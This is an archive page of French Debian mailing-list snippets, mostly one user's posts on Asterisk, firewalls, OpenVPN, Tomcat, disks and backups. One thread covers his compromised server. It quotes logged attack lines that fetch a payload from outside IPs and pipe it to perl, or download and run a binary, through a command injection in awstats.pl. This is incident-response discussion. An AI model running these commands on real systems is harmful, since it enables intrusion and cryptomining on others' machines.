didier gaumet a écrit :
> Le 06/05/2024 à 09:42, BERTRAND Joël a écrit :
> [...]
>> Si je regarde par exemple libwxgtk3.2-1t64, le seul fichier
>> d'en-têtes
>> semble être libwxgtk3.2-dev qui veut désinstaller libwxgtk3.2-1t64 pour
>> remettre libwxgtk3
Basile Starynkevitch a écrit :
>
> On 5/6/24 09:42, BERTRAND Joël wrote:
>> Bonjour à tous,
>>
>> Il vient d'y avoir une salve de bibliothèques avec une extension t64
>> (pour time_t en 64 bits contre 32). Très bien, mais quelqu'un saurait-il
>&g
Bonjour à tous,
Il vient d'y avoir une salve de bibliothèques avec une extension t64
(pour time_t en 64 bits contre 32). Très bien, mais quelqu'un saurait-il
où trouver les fichiers d'en-tête correspondant ?
Si je regarde par exemple libwxgtk3.2-1t64, le seul fichier
Gabriel Moreau a écrit :
> Vrai pour Apple dont le noyau Darwin est un dérivé des BSD.
Non, le noyau est un micronoyau avec des serveurs de type Unix par
dessus (du code pompé à Free et NetBSD). C'est le pire truc qui puisse
exister.
> Faux pour
> Windows qui n'a rien d'UNIX. Windows NT
François TOURDE a écrit :
> Le 19846ième jour après Epoch,
> Olivier écrivait:
>
>> Bonjour,
>>
>> J'envisage de mettre en place un serveur DNS dont le rôle serait de
>> résoudre des requêtes sur un de mes domaines.
>
> Il y a des chances que ton registrar te propose son propre DNS. Pourquoi
>
didier gaumet a écrit :
>
> Bonjour,
Bonsoir,
> avertissement: je n'y connais absolument rien et je réponds peut-être au
> moins en partie à côté de la question que tu poses
L'essentiel est de participer ;-)
Plus sérieusement, merci d'apporter un nouvel éclairage sur
Bonjour à tous,
Je viens de câbler une interface USB vers RS232 + GPIO qui fonctionne
avec un composant CY7C65211.
Celui-ci est reconnu comme un thermomètre par le noyau Linux. J'ai donc
rajouté une règle udev pour corriger cela :
KERNEL=="*", SUBSYSTEM=="usb",
NoSpam a écrit :
> Bonsoir
>
> Le 26/03/2024 à 18:13, BERTRAND Joël a écrit :
>> [...]
>>
>> Deuxième question : le serveur FTP est un OS un peu spécial qui ne
>> comprend pas IPv6. Est-il possible de rediriger IPv6 sur du V4 de
>> manière transpar
Bonjour à tous,
J'essaie d'installer sans succès un reverse ftp proxy et je me demande
si ce que je cherche à faire est possible.
Configuration :
IP publique --- serveur frontal Linux --- LAN --- serveur FTP anonyme
L'IP publique est propre au serveur FTP que je
Bonjour,
Il y a un gros problème avec gnutls mais je pensais que ça se limitais
à testing. J'ai réussi à m'en sortir hier en forçant l'installation de
la mise à jour de gnutls et de ses dépendances et en _réinstallant_ le
reste qui a été viré par un dist-upgrade. Seul cups est
Bonsoir à tous,
je viens de m'apercevoir que sensord n'est plus disponible dans les
dépôts. C'était une chose très pratique qui balançait dans syslog les
sorties de sensors lorsqu'il y avait une alarme de température. Par quoi
est-ce que cela a été remplacé, je ne trouve rien...
Je ne sais pas pourquoi je ne peux pas avoir la copie du mail dans la
réponse. On va donc copier à la main.
>Pour l’architecture globale, si je comprends bien c’est :
Un serveur de fichiers sous un *nix contenant à la fois les boot des
PC et leurs données
Des postes sans disque
zithro a écrit :
> On 24 Feb 2024 23:23, BERTRAND Joël wrote:
>> Un gros serveur sous NetBSD et toutes les stations sont diskless et
>> bootent sur le réseau. Les disques sont en NFS et les swaps en iSCSI.
>
> Peux-tu expliquer ce choix (NFS vs iSCSI) stp ?
Oui,
Basile Starynkevitch a écrit :
>
> On 2/23/24 12:02, Erwann Le Bras wrote:
>>
>> Bonjour
>>
>> Peut-être faire des essais avec SSHFS? le $HOME des utilisateurs
>> serait monté sur chaque client au boot.
>>
>> Mais je ne sais pas si c'est plus efficace que NFS.
>>
>
> J'aurais tendance à imaginer
C'est bien le fait de ne pas avoir usrmerge qui est le fautif parce que
les scripts d'installation ne contiennent plus le PATH canonique !
Je ne dirais pas ce que je pense.
signature.asc
Description: OpenPGP digital signature
Michel Verdier a écrit :
> Le 8 janvier 2024 BERTRAND Joël a écrit :
>
>> J'ai déjà trouvé par le passé mount.nfs qui n'est plus dans /sbin mais
>> dans /usr/sbin (contrairement à ce qu'indique la page man).
> [...]
>> Que les devs de Debian forcent l'utilis
Bon.
J'ai un début de piste et ça commence à être gavant.
J'ai déjà trouvé par le passé mount.nfs qui n'est plus dans /sbin mais
dans /usr/sbin (contrairement à ce qu'indique la page man).
Là, on se retrouve avec des PATH dans des scripts de démarrage qui ne
ajh-valmer a écrit :
> On Sunday 07 January 2024 19:47:19 BERTRAND Joël wrote:
>> ... apt dist-upgrade (qui s'est achevé sans erreur).
>> Aujourd'hui, je rallume la machine en question et je n'ai plus de
>> session graphique ... :
>
> Sans doute, suite à l'upgrade, le n
Michel Verdier a écrit :
> Le 7 janvier 2024 BERTRAND Joël a écrit :
>
>> Hier, j'ai du configurer ce qu'il fallait pour pouvoir accéder à des
>> bluerays. Très bien, ça fonctionnait. Mais pour cela, j'ai du passer un
>> apt dist-upgrade (qui s'est achevé sans erreur)
Bonjour à tous et bonne année.
Il m'arrive un truc étonnant sur une machine qui me sert de serveur
multimedia. Cette machine est diskless et fonctionnait parfaitement
jusqu'à hier (pas noté la version du noyau). Ce n'est pas une Debian,
c'est une Devuan, mais les paquets et la
Bon, trouvé.
Dans tcpServer.c, il faut remonter d'une ligne close(newSocket).
Désolé pour le bruit.
signature.asc
Description: OpenPGP digital signature
Désolé, j'ai oublié le code serveur.
JB
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT
int main(){
int sockfd, ret;
struct sockaddr_in serverAddr;
int newSocket;
struct sockaddr_in newAddr;
socklen_t addr_size;
char
Je viens de reproduire la chose avec deux bouts de programmes écrits en
C (voir les deux pièces jointes).
hilbert:[~/rpl-test] > ./server
[+]Server Socket is created.
[+]Bind to port
[+]Listening
accept(3, 4)
Connection accepted from 127.0.0.1:43388
Client: aze
Disconnected from
e programme finit par planter faute de descripteur de socket
disponible (trop de fichiers ouverts).
Je viens de passer le code dans valgrind et je ne comprends pas bien :
Root rayleigh:[~/exemple] > valgrind --track-fds=yes ./connecteur.rpl
+++RPL/2 (R) version 4.1.35 (Jeudi 23/11/20
yamo' a écrit :
> BERTRAND Joël a tapoté le 17/10/2023 17:10:
>> Bonjour à tous,
>
> Bonjour,
>
>>
>> Je tente la configuration d'inn (parce que depuis que le service chez
>> Nerim a été laissé en déshérence, je fais avec celui de free.fr qui est
>
Erwan David a écrit :
> Le 17/10/2023 à 17:05, BERTRAND Joël a écrit :
>> Bonjour à tous,
>>
>> Je tente la configuration d'inn (parce que depuis que le service chez
>> Nerim a été laissé en déshérence, je fais avec celui de free.fr qui est
>> à peine mieux
Bonjour à tous,
Je tente la configuration d'inn (parce que depuis que le service chez
Nerim a été laissé en déshérence, je fais avec celui de free.fr qui est
à peine mieux...) et il y a un point que je ne comprends pas bien.
inn est censé se connecter à d'autres serveurs
Bonjour à tous,
J'essaye d'installer une bibliothèque python (et je me souviens
pourquoi je hais ce truc, mais c'est une autre histoire).
La bibliothèque en question est pcbnewTransition qui a un makefile.
Parfait, je sais créer le paquet :
[~] > make package
Je
Gaëtan Perrier a écrit :
> Par exemple le raytracing ne semble pas supporté sur les cartes AMD
> alors qu'il fonctionne sur Nvidia (ainsi que le DLSS) ?
Chez AMD, on trouve le FSR qui semble aussi efficace. Quant au
raytracing, la carte que j'utilise ne doit pas savoir qu'il n'est pas
ajh-valmer a écrit :
> Les cartes Nvidia ont une très bonne qualité de rendu à l'écran.
> avec leur pilote, il y a une configuration sophistiquée de la carte,
> permettant d'améliorer le rendu (nvidia-settings).
> Les pilotes libres n'ont pas cet outil de config.
> Seulement, leurs pilotes ne
Gaëtan Perrier a écrit :
> Je suis d'accord sur le fond mais le problème c'est que les cartes
> NVIDIA, d'après tout ce je lis, semblent être les plus performantes.
> Là j'envisage de changer de PC car il commence à atteindre ses limites,
> et en cherchant un peu je vois que le support des
ajh-valmer a écrit :
> On Tuesday 12 September 2023 23:24:24 Gaëtan Perrier wrote:
>> Les pilotes nvidia legacy 390 de sid étant maintenant compatibles avec les
>> kernel jusqu'à 6.5 je suis repassé sur le pilote proprio.
>> Avec nouveau c'était invivable.
>
> Je n'ai jamais réussi à faire
Michel Verdier a écrit :
> Le 25 août 2023 Olivier a écrit :
>
>> 1. Connaissez-vous un document qui justifie techniquement ces
>> "questions de sécurité" ?
>
> La sécurité en vivant caché :) A l'inverse beaucoup de routeurs répondent
> au ping. Si tu fais un traceroute tu le vois bien.
Trouvé.
C'est l'option comp-lzo qui met le bazar. Je l'avais sur les deux
machines clientes (l'une est sur un accès Wanadoo-Santé de 512 kbps, si,
si, ça existe /encore/), l'autre sur un accès GPRS. Je n'avais pas cette
option côté serveur. Visiblement, jusqu'à la dernière version d'OpenVPN,
le
Bonjour à tous,
J'ai un petit souci avec un serveur OpenVPN (qui fonctionnait
parfaitement jusqu'ici). Les clients se connectent bien sur le serveur
mais rien ne passe sur l'interface tap0. Je n'ai rien de particulier
dans les sorties d'OpenVPN (même avec verb=10).
Le
Etienne Vogt a écrit :
>
> Une possible piste est que tomcat9 a des protections additionnelles par
> rapport à tomcat8, donc si on installe une servlet ailleurs que dans les
> chemins par défaut, il faut autoriser l'accès dans
> /etc/systemd/system/tomcat9.service
>
> Par ex. pour un IdP
didier gaumet a écrit :
> Le 06/07/2023 à 08:26, BERTRAND Joël a écrit :
>> didier gaumet a écrit :
>>> Mais ceci étant, le lien -bien qu'extrait du site Alfresco- que je t'ai
>>> indiqué semble justement expliquer comment installer et configurer
>>> *Tomcat* p
didier gaumet a écrit :
> Mais ceci étant, le lien -bien qu'extrait du site Alfresco- que je t'ai
> indiqué semble justement expliquer comment installer et configurer
> *Tomcat* pour le bon fonctionnement d'Alfresco, entre autres les
> chemins, mais pas seulement
>
> Mais bon, j'ai peut-être rien
didier gaumet a écrit :
> Avertissement: si je n'ai pas répondu à ton précédent message c'est que
> je suis totalement inculte sur le sujet
>
> Y a un paragraphe de la doc Alfresco qui a l'air de s'intéresser aux
> aspects du problème qui t'intéresse (regarde à "classpath"):
>
Bonsoir à tous,
Trouvé... Enfin, j'ai trouvé le fautif, mais je ne sais pas trop
comment résoudre le problème.
J'avais galéré pour installer Alfresco et j'avais utilisé la variable
CATALINA_BASE=/opt/alfresco
dans /etc/default/tomcat9. Ça fonctionnait très bien. Sauf
Bonjour à tous,
Désolé de polluer comme ça la liste depuis hier, mais je galère sur une
mise à jour de serveur à la suite d'un déménagement d'infrastructure...
J'ai installé il y a plusieurs années un serveur Alfresco, tout d'abord
en version 6.0 puis en version 6.1.
NoSpam a écrit :
>
> Le 03/07/2023 à 15:12, BERTRAND Joël a écrit :
>> NoSpam a écrit :
>>> Ils n'arrivent jamais plus loin que mangle INPUT qui est avant la table
>>> nat et filter
>> D'accord. Mais dans ce cas, pourquoi sngrep les intercepte ?
> Tout
NoSpam a écrit :
> Ils n'arrivent jamais plus loin que mangle INPUT qui est avant la table
> nat et filter
D'accord. Mais dans ce cas, pourquoi sngrep les intercepte ?
JB
Thomas Trupel a écrit :
> C'est un comportement normal à mes yeux.
>
> L'ajout d'une règle avec la target TRACE devrait te confirmer que les
> paquets sont bloqués par le firewall.
J'obtiens ceci :
2023-07-03T14:37:45.868470+02:00 rayleigh kernel: [705875.038988] TRACE:
raw:PREROUTING:policy:2
Thomas Trupel a écrit :
> C'est un comportement normal à mes yeux.
>
> L'ajout d'une règle avec la target TRACE devrait te confirmer que les
> paquets sont bloqués par le firewall.
Dans le cas de SIP, ils sont tout de même récupérés par sngrep :
[ ] 359 INVITE 100@1.1.1.1
C'est même pire que ça !
Si je fais un nmap depuis l'extérieur sur le serveur en question,
j'obtiens bien :
legendre# nmap 192.168.15.18
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-03 14:09 CEST
Nmap scan report for 192.168.15.18
Host is up (0.00078s latency).
Not shown: 987 filtered tcp
Je l'ai...
Il fallait mettre l'IP du serveur dans contact.
Je pense que la doc d'asterisk est parfaite pour quelqu'un qui sait déjà
exactement de quoi il retourne, mais pour quelqu'un qui en est à sa
première installation, c'est un peu galère. Je vais essayer de rédiger
quelque chose pour les
NoSpam a écrit :
>
> Le 03/07/2023 à 12:57, BERTRAND Joël a écrit :
>> NoSpam a écrit :
>>> Le 03/07/2023 à 12:07, BERTRAND Joël a écrit :
>>>> NoSpam a écrit :
>>>>> Stop: n'as tu pas dit que les postes en interne arrivent à s'appeler ?
>>&
NoSpam a écrit :
>
> Le 03/07/2023 à 12:07, BERTRAND Joël a écrit :
>> NoSpam a écrit :
>>> Stop: n'as tu pas dit que les postes en interne arrivent à s'appeler ?
>>> Si c'est le cas, cela veut dire qu'asterisk ne sait pas comment traiter
>>> l'appel.
&
Bonjour à tous,
Je suis en train de configurer (péniblement) un serveur asterisk qui
est dans un DMZ. Tout le flux entrant sur l'IP publique est naté vers ce
serveur, protégé par un firewall iptables et fail2ban. Il s'agit
d'iptables et non d'iptables-legacy.
Cette
NoSpam a écrit :
> Je me suis mal exprimé: le SPA arrive bien à appeler les autres postes
> ou l'écho test d'Asterisk (extension 600 par défaut si activer) ?
>
> Si oui, le problème est au niveau d'asterisk, vois mon dernier courriel.
Il n'y a que des SPA et ils peuvent tous s'appeler
NoSpam a écrit :
> Stop: n'as tu pas dit que les postes en interne arrivent à s'appeler ?
> Si c'est le cas, cela veut dire qu'asterisk ne sait pas comment traiter
> l'appel.
>
> 34. No circuit/channel available
>
> Renvois STP le context internal
Je réponds à toutes les questions dans le même
NoSpam a écrit :
> Ton asterisk (192.168.1.1) qui répond 503 au SPA
>
> Il faudrait la config complète du SPA
J'ai bien une sauvegarde de la configuration, mais ce n'est pas un
fichier texte :
hilbert:[~] > file SPA112_1.4.1.cfg
SPA112_1.4.1.cfg: dBase III DBT, version number 0
NoSpam a écrit :
>> Je ne saisis pas comment ces paquets arrivent à passer le firewall.
> Ce sont les attaques dont je parlais précédemment. Il semble qu'il y ai
> un trou dans le FW. Y'a pas du nat sur le Cisco pour le wan => lan ?
Le serveur est en DMZ donc récupère tout ce qui
NoSpam a écrit :
> On peut avoir les logs "lisibles", je me demande si ce n'est pas le SPA
> qui envoit cette erreur ...
On va réessayer.
2023/07/03 11:16:49.319643 192.168.10.253:5060 -> 192.168.1.1:5060
INVITE sip:0052@192.168.1.1 SIP/2.0
Via: SIP/2.0/UDP
NoSpam a écrit :
> Ton problème: error 503 Service Unavailable
>
> Es tu sûr que le service est fonctionnel ?! Es tu sûr de la qualité de
> ton lien ? Peux tu basculer en UDP pour tester ?
Le serveur en face ne répond pas en UDP. La réponse est donc non.
Un point me chagrine. À
NoSpam a écrit :
>> rayleigh*CLI> core set verbose 3
>> Console verbose was OFF and is now 3.
>> [Jul 2 23:11:18] WARNING[22514]: res_pjsip.c:2497 set_id_from_hdr:
>> CallerID Name 'BERTRAND Jo�l' for number '6001' has invalid UTF-8
>> characters which were replaced
>> [Jul 2 23:11:18]
NoSpam a écrit :
>
> Le 02/07/2023 à 19:36, BERTRAND Joël a écrit :
>> NoSpam a écrit :
>>> Le 02/07/2023 à 18:27, BERTRAND Joël a écrit :
>>>> [...]
>>>> - tous les appels sortants échouent lamentablement ;
>>> Poste les logs. En cli, core s
NoSpam a écrit :
>
> Le 02/07/2023 à 18:27, BERTRAND Joël a écrit :
>> [...]
>> - tous les appels sortants échouent lamentablement ;
> Poste les logs. En cli, core set verbose 3 puis passe un appel en copie
> les logs ici
>> - les appels entrants font bien sonner l
NoSpam a écrit :
> Fallait dire de suite que c'était pour un SPA ! C'est plus délicat mais
> cela fonctionne
>
> 1. d'ou sort le E accolé au 6001 ?
De nulle part, c'était un test pour ne pas avoir un identifiant
totalement numérique.
Je m'occuperai de cela lorsque j'aurai
NoSpam a écrit :
> sip:6001E@192.168.1.1
>
> https://www.asterisk.org/identifying-endpoint-pjsip/
Rien n'y fait.
Si je colle 6001 dans le SPA112, j'ai bien une trame qui demande une
authentification du login sip:6001E@192.168.1.1. Mais que je colle
username=6001E,
NoSpam a écrit :
> Remplace user=6002 par username=SDA112net2501
Dès que je mets autre chose qu'une suite de chiffres, je reçois ceci
comme erreur :
[Jul 2 15:52:30] NOTICE[9876]: res_pjsip/pjsip_distributor.c:676
log_failed_request: Request 'REGISTER' from '"BERTRAND Jo�l"
' failed for
NoSpam a écrit :
> Bonjour.
Bonjour,
> chan_sip est deprecated depuis longtemps et sera retiré avant la fin de
> l'année. pjsip est son successeur, évolution obligatoire.
>
> J'ose espérer que tes ports 506/5061 UDP & TCP ne sont pas ouverts sur
> Internet, avec ta configuration tu
Bon, j'ai réussi à régler le coup des appels entrants. Le '.' et le '!'
ne peuvent pas être utilisés n'importe où et les regex sont un peu
tatillonnes.
Reste le problème des appels sortants :
[User-standard]
exten => 6001,1,Dial(SIP/6001)
exten => 6002,1,Dial(SIP/6002)
exten =>
Bonjour à tous,
Je tente la configuration d'un serveur asterisk et je me noie un peu
dans la configuration.
Ce que j'ai fait jusqu'à présent :
- installation d'un serveur asterisk (20.3.0~dfsg+~cs6.13.40431413-1) ;
- configuration du fichier users.conf pour rajouter tous
Michel Verdier a écrit :
> Et d'ailleurs pourquoi mixer les outils ?
Pourquoi ? Mais parce que fail2ban dans sa configuration par défaut
s'est mis à utiliser nftables alors qu'il est tout à fait possible
d'utiliser un firewall iptables (xtables) par ailleurs. J'ai d'ailleurs
modifié ces
NoSpam a écrit :
> Bonsoir
>
> https://developers.redhat.com/blog/2020/08/18/iptables-the-two-variants-and-their-relationship-with-nftables#using_iptables_nft
Merci.
Mais ça ne répond pas trop à ma question sauf s'il faut comprendre
entre les lignes que les paquets passent
Bonsoir à tous,
J'ai toujours écrit mes firewalls à la main. Aujourd'hui, un script
charge au démarrage le contenu de /var/lib/iptables/active au travers de
iptables (nf_tables).
Or iptables-legacy est toujours disponible.
J'avoue avoir un peu de mal à comprendre
BERTRAND Joël a écrit :
> BERTRAND Joël a écrit :
>> OK, je l'ai.
>>
>> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
>> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
>> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell
BERTRAND Joël a écrit :
> OK, je l'ai.
>
> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
> /dev/shm;wget -O - http://68.235
OK, je l'ai.
2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
/dev/shm;wget -O - http://68.235.39.225/sepax|perl
2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
/dev/shm;wget -O - http://68.235.39.225/sepax|perl
J'ai le script perl (mais vous pouvez
Michel Verdier a écrit :
> Le 25 juin 2023 BERTRAND Joël a écrit :
>
>> Petite remarque : j'ai modifié allow_url_fopen de on à off dans le
>> fichier de configuration de php 8.2 (je ne vois pas pourquoi c'est 'on'
>> par défaut). /tmp est maintenant en noexec.
>
BERTRAND Joël a écrit :
> #!/bin/bash
>
> if [ $1 == "/usr/bin/rlog" ]; then exit 0; fi
> if [ $1 == "/usr/bin/rcsdiff" ]; then exit 0; fi
> logger -i "shell $*"
> for i in $(pstree -p); do logger -i $i; done
>
> exec $*
Ce script
Erwann Le Bras a écrit :
> bonjour
Bonjour,
> plusieurs pistes :
>
> - un truc qui se lance au démarrage de la machine et reste bien planqué
> qui lance la saleté de temps en temps) ?
> Je pense par exemple, s'il a exploité une faille de Apache à la base, a
> pu modifié la config pour
NoSpam a écrit :
> Bonjour
>
> rkhunter et chkrootkit ne détectent rien ?
chkrootkit ne couine pas (il tourne depuis des années dans un cron).
rkhunter que j'ai lancé hier non plus.
Sébastien Dinot a écrit :
> BERTRAND Joël a écrit :
>> Porte d'entrée trouvée :
>
> Merci pour ce retour, toujours intéressant à avoir.
Porte d'entrée trouvée, mais il reste des scories. Je suis en train de
logguer ce que fait sh pour savoir quel est le processus qui m
Porte d'entrée trouvée :
GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1\n"
"GET
Quelques nouvelles.
Le bot en question est une version moderne d'un vieux truc (on en
trouve des traces depuis 2003) :
https://www.politoinc.com/post/2015/04/01/analysis-of-a-romanian-botnet
https://forum.directadmin.com/threads/cannot-restart-apache.17795/
Sébastien Dinot a écrit :
> Le 2023-06-23 10:08, BERTRAND Joël a écrit :
>> Ma question est donc assez simple ;-) Comment trouver par quoi sont
>> lancés ces deux processus ?
>
> En pareille circonstance, il n'y a qu'une seule solution : analyse du
> disque depuis un
Bonjour à tous,
Je reviens au sujet de ma machine vérolée. J'ai un peu avancé sur le
sujet. J'ai trouvé la porte d'entrée et corrigé.
Le processus hwm est un mineur de bitcoin. Celui-ci a été éradiqué et
ne revient plus m'embêter.
À intervalle régulier (ce matin
hamster a écrit :
> Le 16/06/2023 à 11:21, BERTRAND Joël a écrit :
>> hamster a écrit :
>>> Le 16/06/2023 à 08:34, BERTRAND Joël a écrit :
>>>> Bonjour,
>>>>
>>>> J'en pense que c'est un Seagate. J'ai eu des tas de disques
>>&g
hamster a écrit :
> Le 16/06/2023 à 08:34, BERTRAND Joël a écrit :
>> Bonjour,
>>
>> J'en pense que c'est un Seagate. J'ai eu des tas de disques comme ça
>> qui montraient des valeurs aberrantes et j'ai creusé. Il s'avère que le
>> problème est un firmware
hamster a écrit :
> j'ai un disque dur pour lequel badblocks s'est terminé sans erreurs,
> l'auto-test de smart s'est aussi terminé sans erreurs, pourtant dans le
> rapport de smart je vois 3 chiffres qui m'inquietent :
> Raw_Read_Error_Rate 70428466
> Seek_Error_Rate 371778543
> 149 --- Number
Bonjour à tous,
Je poste ici en sachant parfaitement que je suis hors sujet, mais je
pense que certains ont été confrontés au même problème. Merci de
répondre directement et non sur la liste pour ne pas polluer.
Ancien client Nerim, je me retrouve malheureusement chez
Michel Verdier a écrit :
> Le 31 mai 2023 BERTRAND Joël a écrit :
>
>> C'est donc un blog (b2evolution) qui traîne-là qui est percé. Quelqu'un
>> sait-il d'ailleurs sur quoi migrer un blog b2evolution ? b2evolution
>> n'est plus supporté. J'ai bien vu ceci que
Basile Starynkevitch a écrit :
>
> On 5/31/23 09:55, BERTRAND Joël wrote:
>> Bonjour à tous,
>>
>> Hier soir, je me suis aperçu qu'un serveur ramait énormément. En
>> regardant de près, j'ai trouvé un exécutable étrange :
>>
>> /dev/shm/hwm
>
Bonjour à tous,
Hier soir, je me suis aperçu qu'un serveur ramait énormément. En
regardant de près, j'ai trouvé un exécutable étrange :
/dev/shm/hwm
avec les droits de www-data:www-data, un fichier de configuration et un
autre programme (hwmon). /dev/shm/hwm utilisait 100% de
Bonjour à tous,
Désolé pour le HS, tout est dans le titre. Si vous êtes dans ce cas-là,
pouvez-vous me contacter par message privé ?
Merci,
JKB
Bonjour à tous,
Je suis en train d'essayer de me faire la main avec un e imprimante 3D
supportée par Cura (motif : imprimer des feeders pour ma machine de
pick'n place).
J'utilise la version packagée (4.13.0-1).
Lorsque je la démarre, j'ai des erreurs de plugins
didier gaumet a écrit :
> Le mercredi 12 avril 2023 à 11:15 +0200, Basile Starynkevitch a écrit :
>> [...]
>> le SSD faiblit graduellement (et la rumeur dit qu'il arrive de tomber
>> en panne en totalité).
>>
>> Bizarrement et contrairement à mon intuition, les SSD me semblent
>> tomber en panne
Firenze Réat a écrit :
> Bonjour à tous,
>
> Les disques SSD sont peu utilisés sur les serveurs, car d'une part leur
> prix grimpe rapidement, plus que pour les disques HDD, si on cherche
> dans les grandes capacités.
>
> D'autre part, leur fonctionnement électronique ne permet pas un stockage
>
Michel Verdier a écrit :
> Le 6 avril 2023 BERTRAND Joël a écrit :
>
>> Ce qui doit correspondre peu ou prou aux diff/inc de Bacula. Bacula est
>> totalement transparent lorsqu'il s'agit de restaurer les fichiers (il
>> propose les différentes versions des fichiers
Jean-François Bachelet a écrit :
> j'ai jeté un oeil à baccula et je suis d'accord avec la complexité de
> configuration, arg.
>
> tu aurais un tuto fiable (et récent) pour ça à nous conseiller ? ou un
> exemple basé sur ta config ?
>
> parce que sur le net y à boire et à manger la dessus...
>
Michel Verdier a écrit :
> Le 6 avril 2023 BERTRAND Joël a écrit :
>
>> J'ai une sauvegarde complète tous les mois, une différentielle par
>> semaine et une incrémentale tous les jours. La rotation des données
>> d'archivage est automatique.
>
> Oui une des gro
benoit a écrit :
> Bonjour
>
> Habituellement Clonezilla installé sur un disque externe et boot l'ordi
> sur le disque externe qui lance Clonezilla.
> Mais ces redémarrages, c'est pénible de devoir arrêter, aller dans la
> séquence de boot positionnée sur le lecteur externe... C'est dissuasif
>
mathieu.ro...@r4m.fr a écrit :
> Sinon, sur la remarque : " Le fisc enverra la facture à notre place. Ça, je
> n'y crois pas un seul instant", je dirais plutôt pourquoi pas, en attendant
> d'en savoir plus. Le but du jeu est de récupérer un paquet de fric sur la
> fraude à la TVA, si ça passe
Alain Vaugham a écrit :
> Le Thu, 23 Feb 2023 12:23:05 +0100,
> BERTRAND Joël a écrit :
>
>> Alain Vaugham a écrit :
>>> Le fisc enverra la facture
>>> à notre place.
>> Ça, je n'y crois pas un seul instant vu comme les services
>> fiscaux fonc
Alain Vaugham a écrit :
> Le fisc enverra la facture
> à notre place.
Ça, je n'y crois pas un seul instant vu comme les services fiscaux
fonctionnent. C'est encore du boulot comptable en plus, gratuitement
pour l'état, donc des charges en plus et des augmentations de prix pour
le
didier gaumet a écrit :
> Tu as bien un compte sur le Luniistore et tu es bien connecté à ce
> compte quand tu essaies de te servir de ton appareil? parce qu'ils ont
> l'air de dire sur le site de l'éditeur que c'est nécessaire. Y a aussi
> une adresse de contact et ils ont l'air de supporter
Haricophile a écrit :
> Le Sat, 18 Feb 2023 11:09:17 +0100,
> BERTRAND Joël a écrit :
>
>> Or lorsque je branche l'appareil sur un port usb, si je vois
>> bien un périphérique de type block (sda) arriver, jamais les droits
>> associés ne sont 0666. Je pense avoir
1 - 100 of 808 matches
Mail list logo